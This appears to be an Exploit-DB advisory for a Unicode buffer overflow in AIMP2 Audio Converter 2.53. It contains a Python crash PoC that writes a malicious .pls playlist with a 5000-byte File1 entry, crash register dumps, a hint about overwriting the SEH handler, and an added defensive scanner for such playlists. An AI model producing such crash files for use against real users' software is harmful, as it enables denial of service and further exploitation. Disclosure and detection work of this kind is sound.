Vendor: AIMP2 Audio Converter
By: mr_me
CVSS: 7.5 (HIGH)
Type: Unicode overflow
CWE: N/A
Product Name: AIMP2 Audio Converter
Affected Version From: 2.53 (build 330)
Affected Version To: 2.53 (build 330)
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2009

AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC

This is a local crash PoC: AIMP2 Audio Converter 2.53 (build 330) does not bound the length of a File entry when it loads a .pls/.m3u playlist, so a 5000-byte entry overruns a Unicode (UTF-16) buffer and the overflow data reaches the SEH handler. Because the overflow is Unicode, the author notes that turning the crash into code execution would require a CALL EAX instruction at an address of the form 0x00XX00XX, which this PoC does not attempt. Crash breakdown: EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~, ECX 00000273, EDX 00000C4C, EBX 00000000, ESP 0012DCA8, EBP 0012DD64, ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~, EDI 00130000 ASCII "Actx ", EIP 004530C6 AIMP2.004530C6. When the exception is passed to the overwritten handler, EIP becomes 00410041 (the UTF-16 encoding of "AA" from the overflow data).

Mitigation:

N/A

Exploit-DB raw data:

#!/usr/bin/python
#
# ######################################################################
#
# AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC
# Found & exploited by: mr_me
# Download: ftp://www.catode.ru/AIMP/aimp_2.51.330.zip
# Tested on: Wind0ws XP SP3
#
# ######################################################################
#
# Unicode overflow, maybe someone with better skills can exploit this
# you need to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction.
# Here is the crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exception handler to overwrite EIP...
#
# EIP 00410041
#

# Minimal .pls playlist: the header is well formed, but the File1 entry is a
# 5000-byte run of "A" (0x41) that overruns the converter's Unicode buffer
# when the playlist is loaded.
header = "[playlist]\nNumberOfEntries=3\n\n"
header += "File1="
crash = "\x41" * 5000

buffer = header + crash
with open('mr_mes_funky.pls', 'w') as out:
    out.write(buffer)
print("[+] mr_mes_funky.pls file created successfully")

# milw0rm.com [2009-09-01]
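As an added defensive example (not part of mr_me's PoC), the following check parses a .pls playlist and flags the pattern the PoC relies on: a File/Title/Length value far longer than any real path, a long run of one repeated byte, or a NumberOfEntries count that does not match the entries present. The 1024-byte limit and the regex for entry keys are assumptions chosen for this example.

```python
import re

# Assumed sane upper bound for a single playlist value; real .pls paths
# and titles are far shorter than the 5000-byte entry in the PoC.
MAX_VALUE_LEN = 1024
PLS_ENTRY = re.compile(r"^(File|Title|Length)(\d+)=(.*)$")

def scan_pls(text, max_len=MAX_VALUE_LEN):
    """Return a list of (line_no, finding) for suspicious .pls content.

    line_no 0 marks a whole-file finding (entry count mismatch)."""
    findings = []
    lines = text.splitlines()
    if not lines or lines[0].strip().lower() != "[playlist]":
        findings.append((1, "missing [playlist] header"))
    declared = None
    file_entries = set()
    for no, line in enumerate(lines, 1):
        if line.lower().startswith("numberofentries="):
            try:
                declared = int(line.split("=", 1)[1])
            except ValueError:
                findings.append((no, "NumberOfEntries is not an integer"))
            continue
        m = PLS_ENTRY.match(line)
        if not m:
            continue
        key, idx, value = m.group(1), int(m.group(2)), m.group(3)
        if key == "File":
            file_entries.add(idx)
        if len(value) > max_len:
            findings.append((no, "%s%d is %d bytes (limit %d)"
                             % (key, idx, len(value), max_len)))
        # A long run of a single repeated byte is the classic overflow pattern.
        if len(value) >= 256 and len(set(value)) == 1:
            findings.append((no, "%s%d is a %d-byte run of %r"
                             % (key, idx, len(value), value[0])))
    if declared is not None and len(file_entries) != declared:
        findings.append((0, "NumberOfEntries=%d but %d File entries present"
                         % (declared, len(file_entries))))
    return findings

if __name__ == "__main__":
    # Constructed sample mirroring the PoC's playlist layout.
    sample = "[playlist]\nNumberOfEntries=3\n\nFile1=" + "A" * 5000 + "\n"
    for line_no, msg in scan_pls(sample):
        print("line %d: %s" % (line_no, msg))
```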